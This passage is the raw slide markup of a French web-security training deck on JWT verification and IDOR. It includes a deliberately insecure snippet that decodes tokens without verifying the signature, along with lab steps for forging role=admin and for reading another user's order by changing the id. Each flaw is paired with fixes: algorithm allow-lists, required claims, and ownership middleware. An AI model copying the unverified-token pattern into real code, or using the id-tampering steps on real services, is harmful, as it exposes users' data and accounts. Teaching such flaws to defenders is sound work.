                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    options={"verify_signature": False},</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if payload.get("role") == "admin":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return admin_panel()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="199339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3081527"/>
            <a:ext cx="64008" cy="199339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3154679"/>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Flask  ·  même idée en Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="160934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payload = jwt.decode(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    token, os.environ["JWT_SECRET"],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    algorithms=["HS256"],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    options={"require": ["exp", "sub"]},</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 SECRET dans l'environnement. Jamais dans le JS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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Express : jwt.verify(token, secret, { algorithms: ['HS256'] }). Le header ne décide pas.</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01 · claims</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Une seule algo, des claims exigés</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>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algorithms=["HS256"]</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On ne croit pas le header. S’il dit none, on refuse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1956815"/>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956815"/>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993391"/>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sub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2212848"/>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Qui est-ce. Sans sub, le token ne désigne personne.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2852927"/>
            <a:ext cx="10058400" cy="822960"/>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852927"/>
            <a:ext cx="64008" cy="82296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889503"/>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exp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3108959"/>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Sans exp, un token volé vit pour toujours.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="37673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Le header ne décide pas. Le serveur décide. L’UI non plus.</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lire un JWT : signé ≠ chiffré</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falsifier role=admin si la signature n’est pas vérifiée</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vérifier avec une allow-list et un exp</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JWT</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lire un JWT : signé ≠ chiffré</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Trois blobs Base64. Tout le monde lit le payload.</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falsifier role=admin si la signature n’est pas vérifiée</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Le JSON suffit. /admin répond 200.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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vérifier avec une allow-list et un exp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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Une algo, pas « ce que le header demande ». exp et sub obligatoires.</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125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02</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IDOR : la facture du voisin, puis un middleware</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talk + lab  ·  Express middleware  ·  décorateur Flask</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6537960" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>02 · le mot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="713232"/>
            <a:ext cx="6537960" cy="310896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IDOR, lettre par lettre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="653796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6080760" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="1316736"/>
            <a:ext cx="6080760" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas de contrôle. Le serveur croit l’id que vous lui tendez.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1847088"/>
            <a:ext cx="653796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6080760" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Direct</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2103120"/>
            <a:ext cx="6080760" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vous pointez l’objet vous-même : /documents/202. Pas un listing déjà filtré.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2633472"/>
            <a:ext cx="653796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6080760" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2889504"/>
            <a:ext cx="6080760" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Une commande, un document, une facture. Une ligne en base.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3419856"/>
            <a:ext cx="653796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6080760" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3675887"/>
            <a:ext cx="6080760" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L’id. 42, 202, un uuid. La référence, pas l’objet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4224527"/>
            <a:ext cx="6537960" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Qui me tire la version IDOR de ce mug, dans Game of Crons ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32" descr="idor-hodor-mug.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7406640" y="1348739"/>
            <a:ext cx="3794760" cy="3794760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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02 · 1</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Être loggé n’est pas avoir le droit sur CET id</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IDOR = Insecure Direct Object Reference. /orders/42.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vous demandez 43. Si le serveur ne vérifie pas le propriétaire, vous lisez le voisin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On ne recopie pas le WHERE dans chaque route. Un middleware. Un décorateur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F0F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720840" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VOUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GET /orders/41</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8891625" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FE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074505" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>LE VOISIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9074505" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GET /orders/42</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90 min</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Incrémenter l’id, puis requireOwner</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day-3/s2_01_idor</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day-3/s2_01_idor  ·  Flask + Express</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Deux comptes, deux commandes. GET /api/orders/&lt;id du voisin&gt;.</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Correctif 1 : WHERE owner_id = moi. 404, pas 403.</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Correctif 2 : le sortir en middleware / décorateur. Toutes les routes y passent.</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Lire le voisin. Scoper. Factoriser en middleware.</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Compte B : GET /api/orders/&lt;id de A&gt;. Lire.</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Ajouter owner_id. 404.</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Express : requireUser, requireOwner. Flask : @require_user, @require_owner.</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129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day-3/s2</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Alice ouvre /notes/203. C’est la note de Samir. Le serveur la sert.</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Cherchez : un middleware Express, un décorateur Flask. Le bon check : le owner EST la personne qui demande.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La solution est à la page suivante. Essayez d’abord. Pas de spoil.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s2-idor-alice.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123070" y="1591056"/>
            <a:ext cx="7915378"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/unsecure/notes/203/ charge l’id. Ça ne prouve pas que vous y avez droit.</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Express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Middleware : auth, puis ownership</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="44165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44165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Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="403250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function requireUser(req, res, next) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const user = users.get(req.cookies.session);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  if (!user) return res.status(401).json({ error: "auth" });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  req.user = user;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  next();</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function requireOwner(req, res, next) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const row = db.prepare(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "SELECT * FROM orders WHERE id = ? AND owner_id = ?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  ).get(req.params.id, req.user.id);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
